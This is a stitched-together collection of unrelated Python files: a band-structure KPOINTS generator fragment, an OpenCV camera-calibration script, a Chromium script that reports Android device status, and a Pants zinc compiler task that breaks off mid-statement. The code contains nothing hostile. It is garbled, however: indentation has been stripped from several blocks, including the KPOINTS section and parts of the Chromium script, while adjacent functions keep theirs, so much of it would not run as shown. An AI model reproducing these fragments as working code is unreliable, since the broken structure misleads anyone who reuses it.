masses, vecs_cart, vecs_frac, vecs_n = get_eff_masses(m, basis)
print 'Principle effective masses and directions:\n'
for i in range(3):
print 'Effective mass (%d): %12.3f' % (i, masses[i])
print 'Original eigenvectors: %7.5f %7.5f %7.5f' % (vecs_cart[i][0], vecs_cart[i][1], vecs_cart[i][2])
print 'Normal fractional coordinates: %7.5f %7.5f %7.5f\n' % (vecs_n[i][0], vecs_n[i][1], vecs_n[i][2])
#
else:
print 'No output file provided, entering the Generation regime...\n'
#
if prg.upper() == "C" and band != 1:
print " Band should be set to 1 for CRYSTAL calculations,"
print " desired band number is set as a parameter (-b) for cry-getE.pl script."
print ""
sys.exit(1)
#
kpoints = generate_kpoints(kpt, st, stepsize, prg, basis)
kpoints_fh = open('KPOINTS', 'w')
kpoints_fh.write("EMC "+EMC_VERSION+"\n")
kpoints_fh.write("%d\n" % len(st))
kpoints_fh.write("Reciprocal\n")
#
for i, kpt in enumerate(kpoints):
kpoints_fh.write( '%15.10f %15.10f %15.10f 0.01\n' % (kpt[0], kpt[1], kpt[2]) )
#
kpoints_fh.close()
print 'KPOINTS file has been generated in the current directory...\n'
| |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Calibrate camera using checkerboard pattern
@author: Kevin Middleton
Based on:
https://github.com/ying17zi/gopro-undistort
and
Off-line camera calibration
Author: Leow Wee Kheng
Department of Computer Science, National University of Singapore
Last update: 20 Sep 2012
http://www.comp.nus.edu.sg/~cs4243/code/calibrate.py
"""
import cv2
import argparse
import random
import time
import sys
if __name__ == '__main__':
    # numpy is required by the cv2.calibrateCamera port below; imported here
    # (script scope) to keep the change local to this block.
    import numpy as np

    # Tic
    t0 = time.time()

    # ---- Parse options ------------------------------------------------------
    parser = argparse.ArgumentParser(description='Options')
    parser.add_argument('-f', '--file',
                        help='Calibration video',
                        required=True)
    parser.add_argument('--fps',
                        help='Frames per second',
                        type=int,
                        required=True)
    parser.add_argument('--rows',
                        help='Number of rows in checkerboard (default = 8)',
                        type=int,
                        required=False)
    parser.add_argument('--columns',
                        help='Number of columns in checkerboard (default = 8)',
                        type=int,
                        required=False)
    parser.add_argument('--grid_width',
                        help='Width of checkerboard squares (default = 1 cm)',
                        required=False)
    parser.add_argument('--grid_height',
                        help='Height of checkerboard squares (default = 1 cm)',
                        required=False)
    parser.add_argument('--save_corners',
                        help='Save corners',
                        action="store_true",
                        required=False)
    parser.add_argument('--max_images',
                        help='Maximum number of images to use for calibration.',
                        type=int,
                        required=False)
    args = parser.parse_args()

    # Defaults when options are not passed on the command line.
    pts_arow = args.rows if args.rows else 9          # internal intersections per row
    pts_acol = args.columns if args.columns else 6    # internal intersections per column
    grid_width = float(args.grid_width) if args.grid_width else 1.0    # cm
    grid_height = float(args.grid_height) if args.grid_height else 1.0  # cm
    writeCorners = 1 if args.save_corners else 0
    max_images = args.max_images if args.max_images else 100

    # Video file
    vidFileName = args.file
    # fps
    fps = args.fps

    ##########################################################################
    # Checking
    print("\n------")
    print("Intersections:", pts_arow, "x", pts_acol)
    print("Square size:", grid_width, "cm x", grid_height, "cm")
    print("Video:", vidFileName)
    print("------\n")

    # Pattern
    patternSize = (pts_arow, pts_acol)

    # Open movie
    vidFile = cv2.VideoCapture(vidFileName)

    # Trim the last 2% off, because CV_CAP_PROP_FRAME_COUNT is not accurate
    nframes = int(0.98 * vidFile.get(cv2.CAP_PROP_FRAME_COUNT))
    width = int(vidFile.get(cv2.CAP_PROP_FRAME_WIDTH))
    height = int(vidFile.get(cv2.CAP_PROP_FRAME_HEIGHT))
    print('Num Frames = ', nframes)
    print('Frame rate =', fps, 'frames per sec\n')

    # ---- Find chessboard corners frame by frame -----------------------------
    # FIX: corners is now an append-only list (the original preallocated
    # list(range(nframes)), which made the later `len(corners) == 0` guard
    # dead code even when no corners were found).
    corners = []
    criteria = (cv2.TERM_CRITERIA_COUNT | cv2.TERM_CRITERIA_EPS, 30, 0.01)

    print("Finding corners...\n")
    fnum = 1
    while vidFile.isOpened():
        ret, frameImg = vidFile.read()
        if frameImg is None:
            # FIX: the original printed the undefined name `f` here (NameError).
            print("no frame", fnum, "flawed. Cancel")
            break
        BWImg = cv2.cvtColor(frameImg, cv2.COLOR_RGB2GRAY)
        # Find corners
        retcode, cor = \
            cv2.findChessboardCorners(BWImg, patternSize,
                                      cv2.CALIB_CB_ADAPTIVE_THRESH +
                                      cv2.CALIB_CB_FAST_CHECK +
                                      cv2.CALIB_CB_NORMALIZE_IMAGE)
        if retcode == 1:
            # Refine corners with subpixel accuracy
            refined = cv2.cornerSubPix(BWImg, cor, (3, 3), (0, 0), criteria)
            corners.append(refined)
            colorimg = cv2.cvtColor(BWImg, cv2.COLOR_GRAY2RGB)
            cv2.drawChessboardCorners(colorimg, patternSize, refined, retcode)
            if writeCorners:
                # File name for image with corners
                filename = vidFileName + "_corner_" + format(fnum, "04d") + ".jpg"
                cv2.imwrite(filename, colorimg)
        fnum += 1
        if fnum % 100 == 0:
            print("Frame: ", fnum)
    vidFile.release()

    nboard = len(corners)
    print("\nFound", nboard, "images with corners.\n")
    if nboard == 0:
        print("No corners detected.\n")
        sys.exit()

    # ---- Calibration --------------------------------------------------------
    # Check that there aren't too many images (~100; downsample if so)
    if len(corners) > max_images:
        print("Reducing the set of images with detected corners to",
              max_images, "images by random selection.\n")
        corners = [corners[i] for i in
                   sorted(random.sample(range(len(corners)), max_images))]
        nboard = len(corners)

    # One 3-D object-point template per board: the checkerboard grid in the
    # z = 0 plane.
    # FIX: the original wrote `(c / pts_arow)`, which is float division under
    # Python 3 and produced a wrong (non-integer-stepped) grid; `//` restores
    # the intended row index.
    ncor = pts_arow * pts_acol
    objp = np.zeros((ncor, 3), np.float32)
    for c in range(ncor):
        objp[c, 0] = (c // pts_arow) * grid_height
        objp[c, 1] = (c % pts_arow) * grid_width
    object_points = [objp] * nboard
    image_points = [np.asarray(cor, dtype=np.float32).reshape(-1, 2)
                    for cor in corners]

    print("Calibrating (this might be slow)...\n")
    # FIX: cv2.CreateMat / SetReal2D / CalibrateCamera2 belong to the removed
    # legacy cv API and do not exist in the cv2 module; use the modern
    # cv2.calibrateCamera, which allocates the output arrays itself.
    rms, camera_matrix, dist_coeffs, rvecs, tvecs = cv2.calibrateCamera(
        object_points, image_points, (width, height), None, None)

    # ---- Save files and print results ---------------------------------------
    print("Camera matrix:")
    camMatFile = vidFileName + "_camera_matrix.csv"
    with open(camMatFile, "w") as out:
        for i in range(3):
            row = [str(camera_matrix[i, j]) for j in range(3)]
            print(" ".join(row))
            out.write(", ".join(row) + "\n")
    print("\n")

    print("Distortion coefficients:")
    distortionCoefsFile = vidFileName + "_distortion_coefficients.csv"
    dc = dist_coeffs.ravel()
    with open(distortionCoefsFile, "w") as out:
        print(" ".join(str(v) for v in dc[:5]))
        out.write(", ".join(str(v) for v in dc[:5]))

    # Toc
    t1 = time.time()
    total = t1 - t0
    print('\n\nTotal time:', total, "s")
| |
#!/usr/bin/env python
# Copyright 2016 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""A script to keep track of devices across builds and report state."""
import argparse
import json
import logging
import os
import re
import sys
if __name__ == '__main__':
sys.path.append(
os.path.abspath(os.path.join(os.path.dirname(__file__),
'..', '..', '..')))
from devil import devil_env
from devil.android import battery_utils
from devil.android import device_blacklist
from devil.android import device_errors
from devil.android import device_list
from devil.android import device_utils
from devil.android.sdk import adb_wrapper
from devil.constants import exit_codes
from devil.utils import lsusb
from devil.utils import run_tests_helper
logger = logging.getLogger(__name__)
_RE_DEVICE_ID = re.compile(r'Device ID = (\d+)')
def IsBlacklisted(serial, blacklist):
  """Returns truthy iff |serial| appears in |blacklist| (None-safe)."""
  if not blacklist:
    # Preserve the original `and` short-circuit: a falsy blacklist value
    # (e.g. None) is returned as-is, not coerced to bool.
    return blacklist
  return serial in blacklist.Read()
def _BatteryStatus(device, blacklist):
  """Collects battery info for |device|; blacklists it when critically low.

  Returns the battery info dict (empty on failure).
  """
  info = {}
  try:
    battery = battery_utils.BatteryUtils(device)
    info = battery.GetBatteryInfo(timeout=5)
    level = int(info.get('level', 100))
    if level < 15:
      logger.error('Critically low battery level (%d)', level)
      battery = battery_utils.BatteryUtils(device)
      if not battery.GetCharging():
        battery.SetCharging(True)
      if blacklist:
        blacklist.Extend([device.adb.GetDeviceSerial()], reason='low_battery')
  except (device_errors.CommandFailedError,
          device_errors.DeviceUnreachableError):
    # Best effort: a device we cannot query still gets an (empty) entry.
    logger.exception('Failed to get battery information for %s',
                     str(device))
  return info
def _IMEISlice(device):
  """Returns the last six digits of the device IMEI, or '' on failure."""
  result = ''
  try:
    output = device.RunShellCommand(['dumpsys', 'iphonesubinfo'],
                                    check_return=True, timeout=5)
    for line in output:
      match = _RE_DEVICE_ID.match(line)
      if match:
        result = match.group(1)[-6:]
  except (device_errors.CommandFailedError,
          device_errors.DeviceUnreachableError):
    logger.exception('Failed to get IMEI slice for %s', str(device))
  return result
def DeviceStatus(devices, blacklist):
  """Generates status information for the given devices.

  Args:
    devices: The devices to generate status for.
    blacklist: The current device blacklist; may be extended as a side effect
      for devices that are offline, unhealthy, or fail the status check.
  Returns:
    A list with one status dict per device, of the following form:
    {
      'serial': '<serial>',
      'adb_status': str,
      'usb_status': bool,
      'blacklisted': bool,
      # only if the device is connected and not blacklisted
      'ro.build.product': str,
      'ro.build.id': str,
      'ro.build.fingerprint': str,
      'ro.build.description': str,
      'battery': {
        ...
      },
      'imei_slice': str,
      'wifi_ip': str,
    }
  """
  # Map of serial -> adb device-list entry; entry[1] is the adb state string
  # (e.g. 'device', 'offline', 'unauthorized').
  adb_devices = {
      a[0].GetDeviceSerial(): a
      for a in adb_wrapper.AdbWrapper.Devices(desired_state=None, long_list=True)
  }
  usb_devices = set(lsusb.get_android_devices())

  def blacklisting_device_status(device):
    # Builds the status dict for one device, extending the blacklist as a
    # side effect when the device is unhealthy.
    serial = device.adb.GetDeviceSerial()
    adb_status = (
        adb_devices[serial][1] if serial in adb_devices
        else 'missing')
    usb_status = bool(serial in usb_devices)

    device_status = {
        'serial': serial,
        'adb_status': adb_status,
        'usb_status': usb_status,
    }

    if not IsBlacklisted(serial, blacklist):
      if adb_status == 'device':
        try:
          build_product = device.build_product
          build_id = device.build_id
          build_fingerprint = device.build_fingerprint
          build_description = device.build_description
          wifi_ip = device.GetProp('dhcp.wlan0.ipaddress')
          battery_info = _BatteryStatus(device, blacklist)
          imei_slice = _IMEISlice(device)

          # Mantaray-specific check: this hardware charges reliably only on
          # AC (the 'AC powered' value comes from dumpsys battery).
          if (device.product_name == 'mantaray' and
              battery_info.get('AC powered', None) != 'true'):
            logger.error('Mantaray device not connected to AC power.')

          device_status.update({
              'ro.build.product': build_product,
              'ro.build.id': build_id,
              'ro.build.fingerprint': build_fingerprint,
              'ro.build.description': build_description,
              'battery': battery_info,
              'imei_slice': imei_slice,
              'wifi_ip': wifi_ip,
          })
        except (device_errors.CommandFailedError,
                device_errors.DeviceUnreachableError):
          logger.exception('Failure while getting device status for %s.',
                           str(device))
          if blacklist:
            blacklist.Extend([serial], reason='status_check_failure')
        except device_errors.CommandTimeoutError:
          logger.exception('Timeout while getting device status for %s.',
                           str(device))
          if blacklist:
            blacklist.Extend([serial], reason='status_check_timeout')
      elif blacklist:
        # Device is visible but not in 'device' state: record the adb state,
        # or 'offline' if it is not even visible over USB.
        blacklist.Extend([serial],
                         reason=adb_status if usb_status else 'offline')

    # Re-read after the possible Extend() calls above so the flag reflects
    # blacklisting done during this very status check.
    device_status['blacklisted'] = IsBlacklisted(serial, blacklist)

    return device_status

  parallel_devices = device_utils.DeviceUtils.parallel(devices)
  statuses = parallel_devices.pMap(blacklisting_device_status).pGet(None)
  return statuses
def _LogStatuses(statuses):
  """Logs a human-readable summary of each device status dict.

  Args:
    statuses: List of per-device status dicts as produced by DeviceStatus().
  """
  # Log the state of all devices.
  for status in statuses:
    logger.info(status['serial'])
    adb_status = status.get('adb_status')
    blacklisted = status.get('blacklisted')
    logger.info(' USB status: %s',
                'online' if status.get('usb_status') else 'offline')
    logger.info(' ADB status: %s', adb_status)
    logger.info(' Blacklisted: %s', str(blacklisted))
    # Build/battery details are only present for healthy, non-blacklisted
    # devices (see DeviceStatus).
    if adb_status == 'device' and not blacklisted:
      logger.info(' Device type: %s', status.get('ro.build.product'))
      logger.info(' OS build: %s', status.get('ro.build.id'))
      logger.info(' OS build fingerprint: %s',
                  status.get('ro.build.fingerprint'))
      logger.info(' Battery state:')
      # .items() instead of the Python-2-only .iteritems(), so this module
      # also runs under Python 3.
      for k, v in status.get('battery', {}).items():
        logger.info(' %s: %s', k, v)
      logger.info(' IMEI slice: %s', status.get('imei_slice'))
      logger.info(' WiFi IP: %s', status.get('wifi_ip'))
def _WriteBuildbotFile(file_path, statuses):
buildbot_path, _ = os.path.split(file_path)
if os.path.exists(buildbot_path):
with open(file_path, 'w') as f:
for status in statuses:
try:
if status['adb_status'] == 'device':
f.write('{serial} {adb_status} {build_product} {build_id} '
'{temperature:.1f}C {level}%\n'.format(
serial=status['serial'],
adb_status=status['adb_status'],
build_product=status['type'],
build_id=status['build'],
temperature=float(status['battery']['temperature']) / 10,
level=status['battery']['level']
))
elif status.get('usb_status', False):
f.write('{serial} {adb_status}\n'.format(
serial=status['serial'],
adb_status=status['adb_status']
))
else:
f.write('{serial} offline\n'.format(
serial=status['serial']
))
except Exception: # pylint: disable=broad-except
pass
def GetExpectedDevices(known_devices_files):
  """Returns the set of device serials listed in the known-devices files."""
  expected = set()
  path = None
  try:
    for path in known_devices_files:
      if not os.path.exists(path):
        logger.warning('Could not find known devices file: %s', path)
        continue
      expected.update(device_list.GetPersistentDeviceList(path))
  except IOError:
    # A read failure aborts the scan but keeps whatever was gathered so far.
    logger.warning('Problem reading %s, skipping.', path)
  logger.info('Expected devices:')
  for device in expected:
    logger.info(' %s', device)
  return expected
def AddArguments(parser):
  """Registers this tool's command-line arguments on |parser|.

  Args:
    parser: An argparse.ArgumentParser instance to populate.
  """
  parser.add_argument('--json-output',
                      help='Output JSON information into a specified file.')
  parser.add_argument('--adb-path',
                      help='Absolute path to the adb binary to use.')
  parser.add_argument('--blacklist-file', help='Device blacklist JSON file.')
  parser.add_argument('--known-devices-file', action='append', default=[],
                      dest='known_devices_files',
                      help='Path to known device lists.')
  parser.add_argument('--buildbot-path', '-b',
                      default='/home/chrome-bot/.adb_device_info',
                      help='Absolute path to buildbot file location')
  # default=1 so a single -v already raises verbosity above the baseline.
  parser.add_argument('-v', '--verbose', action='count', default=1,
                      help='Log more information.')
  parser.add_argument('-w', '--overwrite-known-devices-files',
                      action='store_true',
                      # Typo fix: 'wiht' -> 'with'.
                      help='If set, overwrites known devices files with new '
                           'values.')
def main():
  """Surveys all devices, logs and records their status.

  Returns:
    0 when at least one healthy, non-blacklisted device is available;
    exit_codes.INFRA otherwise (no devices is an infra error).
  """
  parser = argparse.ArgumentParser()
  AddArguments(parser)
  args = parser.parse_args()
  run_tests_helper.SetLogLevel(args.verbose)

  # Point devil at the requested adb binary, if one was given.
  devil_dynamic_config = devil_env.EmptyConfig()
  if args.adb_path:
    devil_dynamic_config['dependencies'].update(
        devil_env.LocalConfigItem(
            'adb', devil_env.GetPlatform(), args.adb_path))
  devil_env.config.Initialize(configs=[devil_dynamic_config])

  blacklist = (device_blacklist.Blacklist(args.blacklist_file)
               if args.blacklist_file
               else None)

  # Consider both previously-known devices and whatever is on USB right now.
  expected_devices = GetExpectedDevices(args.known_devices_files)
  usb_devices = set(lsusb.get_android_devices())
  devices = [device_utils.DeviceUtils(s)
             for s in expected_devices.union(usb_devices)]

  statuses = DeviceStatus(devices, blacklist)

  # Log the state of all devices.
  _LogStatuses(statuses)

  # Update the last devices file(s).
  if args.overwrite_known_devices_files:
    for path in args.known_devices_files:
      device_list.WritePersistentDeviceList(
          path, [status['serial'] for status in statuses])

  # Write device info to file for buildbot info display.
  _WriteBuildbotFile(args.buildbot_path, statuses)

  # Dump the device statuses to JSON.
  if args.json_output:
    # json.dumps returns text, so open in text mode; the original 'wb'
    # raised TypeError under Python 3.
    with open(args.json_output, 'w') as f:
      f.write(json.dumps(
          statuses, indent=4, sort_keys=True, separators=(',', ': ')))

  live_devices = [status['serial'] for status in statuses
                  if (status['adb_status'] == 'device'
                      and not IsBlacklisted(status['serial'], blacklist))]

  # If all devices failed, or if there are no devices, it's an infra error.
  if not live_devices:
    logger.error('No available devices.')
  return 0 if live_devices else exit_codes.INFRA
if __name__ == '__main__':
sys.exit(main())
| |
# coding=utf-8
# Copyright 2014 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import (absolute_import, division, generators, nested_scopes, print_function,
unicode_literals, with_statement)
import errno
import logging
import os
import re
import textwrap
from collections import defaultdict
from contextlib import closing
from hashlib import sha1
from xml.etree import ElementTree
from pants.backend.jvm.subsystems.java import Java
from pants.backend.jvm.subsystems.jvm_platform import JvmPlatform
from pants.backend.jvm.subsystems.scala_platform import ScalaPlatform
from pants.backend.jvm.subsystems.zinc import Zinc
from pants.backend.jvm.targets.annotation_processor import AnnotationProcessor
from pants.backend.jvm.targets.javac_plugin import JavacPlugin
from pants.backend.jvm.targets.jvm_target import JvmTarget
from pants.backend.jvm.targets.scalac_plugin import ScalacPlugin
from pants.backend.jvm.tasks.classpath_util import ClasspathUtil
from pants.backend.jvm.tasks.jvm_compile.jvm_compile import JvmCompile
from pants.base.build_environment import get_buildroot
from pants.base.exceptions import TaskError
from pants.base.hash_utils import hash_file
from pants.base.workunit import WorkUnitLabel
from pants.java.distribution.distribution import DistributionLocator
from pants.util.contextutil import open_zip
from pants.util.dirutil import safe_open
from pants.util.memo import memoized_method, memoized_property
# Well known metadata file required to register scalac plugins with nsc.
_SCALAC_PLUGIN_INFO_FILE = 'scalac-plugin.xml'
# Well known metadata file to register javac plugins.
_JAVAC_PLUGIN_INFO_FILE = 'META-INF/services/com.sun.source.util.Plugin'
# Well known metadata file to register annotation processors with a java 1.6+ compiler.
_PROCESSOR_INFO_FILE = 'META-INF/services/javax.annotation.processing.Processor'
logger = logging.getLogger(__name__)
class BaseZincCompile(JvmCompile):
  """An abstract base class for zinc compilation tasks.

  Subclasses implement select()/select_source() to decide which targets and
  sources they compile; this class owns the zinc invocation itself.
  """

  _name = 'zinc'

  @staticmethod
  def _write_scalac_plugin_info(resources_dir, scalac_plugin_target):
    # Emits the scalac-plugin.xml descriptor that nsc reads to discover the
    # plugin name and entry-point class.
    scalac_plugin_info_file = os.path.join(resources_dir, _SCALAC_PLUGIN_INFO_FILE)
    with safe_open(scalac_plugin_info_file, 'w') as f:
      f.write(textwrap.dedent("""
        <plugin>
          <name>{}</name>
          <classname>{}</classname>
        </plugin>
      """.format(scalac_plugin_target.plugin, scalac_plugin_target.classname)).strip())

  @staticmethod
  def _write_javac_plugin_info(resources_dir, javac_plugin_target):
    # Registers the javac plugin via the standard ServiceLoader metadata file.
    javac_plugin_info_file = os.path.join(resources_dir, _JAVAC_PLUGIN_INFO_FILE)
    with safe_open(javac_plugin_info_file, 'w') as f:
      f.write(javac_plugin_target.classname)

  @staticmethod
  def validate_arguments(log, whitelisted_args, args):
    """Validate that all arguments match whitelisted regexes."""
    valid_patterns = {re.compile(p): v for p, v in whitelisted_args.items()}

    def validate(idx):
      # Returns how many slots args[idx] consumes: 2 when the matched
      # pattern declares a following argument, else 1.
      arg = args[idx]
      for pattern, has_argument in valid_patterns.items():
        if pattern.match(arg):
          return 2 if has_argument else 1
      log.warn("Zinc argument '{}' is not supported, and is subject to change/removal!".format(arg))
      return 1

    arg_index = 0
    while arg_index < len(args):
      arg_index += validate(arg_index)

  @staticmethod
  def _get_zinc_arguments(settings):
    """Extracts and formats the zinc arguments given in the jvm platform settings.

    This is responsible for the symbol substitution which replaces $JAVA_HOME with the path to an
    appropriate jvm distribution.

    :param settings: The jvm platform settings from which to extract the arguments.
    :type settings: :class:`JvmPlatformSettings`
    """
    zinc_args = [
      '-C-source', '-C{}'.format(settings.source_level),
      '-C-target', '-C{}'.format(settings.target_level),
    ]
    if settings.args:
      settings_args = settings.args
      if any('$JAVA_HOME' in a for a in settings.args):
        try:
          # Prefer a strict-version distribution; fall back to non-strict.
          distribution = JvmPlatform.preferred_jvm_distribution([settings], strict=True)
        except DistributionLocator.Error:
          distribution = JvmPlatform.preferred_jvm_distribution([settings], strict=False)
        logger.debug('Substituting "$JAVA_HOME" with "{}" in jvm-platform args.'
                     .format(distribution.home))
        settings_args = (a.replace('$JAVA_HOME', distribution.home) for a in settings.args)
      zinc_args.extend(settings_args)
    return zinc_args

  @classmethod
  def implementation_version(cls):
    # Bump the tuple's number to invalidate cached results when this task's
    # implementation changes.
    return super(BaseZincCompile, cls).implementation_version() + [('BaseZincCompile', 7)]

  @classmethod
  def get_jvm_options_default(cls, bootstrap_option_values):
    # Defaults for the zinc JVM itself.
    return ('-Dfile.encoding=UTF-8', '-Dzinc.analysis.cache.limit=1000',
            '-Djava.awt.headless=true', '-Xmx2g')

  @classmethod
  def get_args_default(cls, bootstrap_option_values):
    # -C* flags are passed through to javac, -S* flags to scalac.
    return ('-C-encoding', '-CUTF-8', '-S-encoding', '-SUTF-8', '-S-g:vars')

  @classmethod
  def get_warning_args_default(cls):
    return ('-C-deprecation', '-C-Xlint:all', '-C-Xlint:-serial', '-C-Xlint:-path',
            '-S-deprecation', '-S-unchecked', '-S-Xlint')

  @classmethod
  def get_no_warning_args_default(cls):
    return ('-C-nowarn', '-C-Xlint:none', '-S-nowarn', '-S-Xlint:none', )

  @classmethod
  def get_fatal_warnings_enabled_args_default(cls):
    return ('-S-Xfatal-warnings', '-C-Werror')

  @classmethod
  def get_fatal_warnings_disabled_args_default(cls):
    return ()

  @classmethod
  def register_options(cls, register):
    super(BaseZincCompile, cls).register_options(register)
    register('--whitelisted-args', advanced=True, type=dict,
             default={
               '-S.*': False,
               '-C.*': False,
               '-file-filter': True,
               '-msg-filter': True,
             },
             help='A dict of option regexes that make up pants\' supported API for zinc. '
                  'Options not listed here are subject to change/removal. The value of the dict '
                  'indicates that an option accepts an argument.')
    register('--incremental', advanced=True, type=bool, default=True,
             help='When set, zinc will use sub-target incremental compilation, which dramatically '
                  'improves compile performance while changing large targets. When unset, '
                  'changed targets will be compiled with an empty output directory, as if after '
                  'running clean-all.')
    register('--incremental-caching', advanced=True, type=bool,
             help='When set, the results of incremental compiles will be written to the cache. '
                  'This is unset by default, because it is generally a good precaution to cache '
                  'only clean/cold builds.')

  @classmethod
  def subsystem_dependencies(cls):
    return super(BaseZincCompile, cls).subsystem_dependencies() + (Zinc.Factory, JvmPlatform,)

  @classmethod
  def prepare(cls, options, round_manager):
    super(BaseZincCompile, cls).prepare(options, round_manager)
    ScalaPlatform.prepare_tools(round_manager)

  @property
  def incremental(self):
    """Zinc implements incremental compilation.

    Setting this property causes the task infrastructure to clone the previous
    results_dir for a target into the new results_dir for a target.
    """
    return self.get_options().incremental

  @property
  def cache_incremental(self):
    """Optionally write the results of incremental compiles to the cache."""
    return self.get_options().incremental_caching

  @memoized_property
  def _zinc(self):
    # Lazily-created handle to the zinc tool set for this run.
    return Zinc.Factory.global_instance().create(self.context.products)

  def __init__(self, *args, **kwargs):
    super(BaseZincCompile, self).__init__(*args, **kwargs)
    # A directory to contain per-target subdirectories with apt processor info files.
    self._processor_info_dir = os.path.join(self.workdir, 'apt-processor-info')

    # Validate zinc options.
    # NOTE: deliberately calls the ZincCompile subclass (defined later in
    # this file) rather than cls/self, matching the original behavior.
    ZincCompile.validate_arguments(self.context.log, self.get_options().whitelisted_args,
                                   self._args)

  def select(self, target):
    # Abstract: subclasses choose which targets they compile.
    raise NotImplementedError()

  def select_source(self, source_file_path):
    # Abstract: subclasses choose which source files they compile.
    raise NotImplementedError()

  def register_extra_products_from_contexts(self, targets, compile_contexts):
    # Publishes zinc analysis files and recorded zinc argument lists as
    # products, when downstream tasks asked for them.
    compile_contexts = [self.select_runtime_context(compile_contexts[t]) for t in targets]
    zinc_analysis = self.context.products.get_data('zinc_analysis')
    zinc_args = self.context.products.get_data('zinc_args')

    if zinc_analysis is not None:
      for compile_context in compile_contexts:
        zinc_analysis[compile_context.target] = (compile_context.classes_dir,
                                                 compile_context.jar_file,
                                                 compile_context.analysis_file)

    if zinc_args is not None:
      for compile_context in compile_contexts:
        with open(compile_context.zinc_args_file, 'r') as fp:
          args = fp.read().split()
        zinc_args[compile_context.target] = args

  def create_empty_extra_products(self):
    if self.context.products.is_required_data('zinc_analysis'):
      self.context.products.safe_create_data('zinc_analysis', dict)

    if self.context.products.is_required_data('zinc_args'):
      self.context.products.safe_create_data('zinc_args', lambda: defaultdict(list))

  def javac_classpath(self):
    # Note that if this classpath is empty then Zinc will automatically use the javac from
    # the JDK it was invoked with.
    return Java.global_javac_classpath(self.context.products)

  def scalac_classpath(self):
    return ScalaPlatform.global_instance().compiler_classpath(self.context.products)

  def write_extra_resources(self, compile_context):
    """Override write_extra_resources to produce plugin and annotation processor files."""
    target = compile_context.target
    if isinstance(target, ScalacPlugin):
      self._write_scalac_plugin_info(compile_context.classes_dir, target)
    elif isinstance(target, JavacPlugin):
      self._write_javac_plugin_info(compile_context.classes_dir, target)
    elif isinstance(target, AnnotationProcessor) and target.processors:
      processor_info_file = os.path.join(compile_context.classes_dir, _PROCESSOR_INFO_FILE)
      self._write_processor_info(processor_info_file, target.processors)

  def _write_processor_info(self, processor_info_file, processors):
    # One fully-qualified processor class name per line, ServiceLoader style.
    with safe_open(processor_info_file, 'w') as f:
      for processor in processors:
        f.write('{}\n'.format(processor.strip()))

  @memoized_property
  def _zinc_cache_dir(self):
    """A directory where zinc can store compiled copies of the `compiler-bridge`.

    The compiler-bridge is specific to each scala version, and is lazily computed by zinc if the
    appropriate version does not exist. Eventually it would be great to just fetch this rather
    than compiling it.
    """
    hasher = sha1()
    for cp_entry in self._zinc.zinc + [self._zinc.compiler_interface, self._zinc.compiler_bridge]:
      # NOTE(review): update() with a str is fine on Python 2 (this codebase);
      # it would need .encode() under Python 3.
      hasher.update(os.path.relpath(cp_entry, self.get_options().pants_workdir))
    key = hasher.hexdigest()[:12]
    return os.path.join(self.get_options().pants_bootstrapdir, 'zinc', key)

  def compile(self, ctx, args, classpath, upstream_analysis,
              settings, fatal_warnings, zinc_file_manager,
              javac_plugin_map, scalac_plugin_map):
    # Assembles the full zinc command line and runs it; raises TaskError on a
    # non-zero exit.
    self._verify_zinc_classpath(classpath)
    self._verify_zinc_classpath(upstream_analysis.keys())

    zinc_args = []
    zinc_args.extend([
      '-log-level', self.get_options().level,
      '-analysis-cache', ctx.analysis_file,
      '-classpath', ':'.join(classpath),
      '-d', ctx.classes_dir
    ])
    if not self.get_options().colors:
      zinc_args.append('-no-color')

    zinc_args.extend(['-compiler-interface', self._zinc.compiler_interface])
    zinc_args.extend(['-compiler-bridge', self._zinc.compiler_bridge])
    zinc_args.extend(['-zinc-cache-dir', self._zinc_cache_dir])
    zinc_args.extend(['-scala-path', ':'.join(self.scalac_classpath())])

    zinc_args.extend(self._javac_plugin_args(javac_plugin_map))
    # Search for scalac plugins on the classpath.
    # Note that:
    # - We also search in the extra scalac plugin dependencies, if specified.
    # - In scala 2.11 and up, the plugin's classpath element can be a dir, but for 2.10 it must be
    #   a jar.  So in-repo plugins will only work with 2.10 if --use-classpath-jars is true.
    # - We exclude our own classes_dir/jar_file, because if we're a plugin ourselves, then our
    #   classes_dir doesn't have scalac-plugin.xml yet, and we don't want that fact to get
    #   memoized (which in practice will only happen if this plugin uses some other plugin, thus
    #   triggering the plugin search mechanism, which does the memoizing).
    scalac_plugin_search_classpath = (
      (set(classpath) | set(self.scalac_plugin_classpath_elements())) -
      {ctx.classes_dir, ctx.jar_file}
    )
    zinc_args.extend(self._scalac_plugin_args(scalac_plugin_map, scalac_plugin_search_classpath))
    if upstream_analysis:
      zinc_args.extend(['-analysis-map',
                        ','.join('{}:{}'.format(*kv) for kv in upstream_analysis.items())])

    zinc_args.extend(self._zinc.rebase_map_args)

    zinc_args.extend(args)
    zinc_args.extend(self._get_zinc_arguments(settings))
    zinc_args.append('-transactional')

    if fatal_warnings:
      zinc_args.extend(self.get_options().fatal_warnings_enabled_args)
    else:
      zinc_args.extend(self.get_options().fatal_warnings_disabled_args)

    if not self._clear_invalid_analysis:
      zinc_args.append('-no-clear-invalid-analysis')

    if not zinc_file_manager:
      zinc_args.append('-no-zinc-file-manager')

    jvm_options = []

    if self.javac_classpath():
      # Make the custom javac classpath the first thing on the bootclasspath, to ensure that
      # it's the one javax.tools.ToolProvider.getSystemJavaCompiler() loads.
      # It will probably be loaded even on the regular classpath: If not found on the bootclasspath,
      # getSystemJavaCompiler() constructs a classloader that loads from the JDK's tools.jar.
      # That classloader will first delegate to its parent classloader, which will search the
      # regular classpath.  However it's harder to guarantee that our javac will preceed any others
      # on the classpath, so it's safer to prefix it to the bootclasspath.
      jvm_options.extend(['-Xbootclasspath/p:{}'.format(':'.join(self.javac_classpath()))])

    jvm_options.extend(self._jvm_options)

    zinc_args.extend(ctx.sources)

    self.log_zinc_file(ctx.analysis_file)
    # Record the exact arguments for debugging / the zinc_args product.
    with open(ctx.zinc_args_file, 'w') as fp:
      for arg in zinc_args:
        fp.write(arg)
        # NOTE(review): writes a bytes newline to a text-mode file; works on
        # Python 2 (this codebase) but would TypeError under Python 3.
        fp.write(b'\n')

    if self.runjava(classpath=self._zinc.zinc,
                    main=Zinc.ZINC_COMPILE_MAIN,
                    jvm_options=jvm_options,
                    args=zinc_args,
                    workunit_name=self.name(),
                    workunit_labels=[WorkUnitLabel.COMPILER],
                    dist=self._zinc.dist):
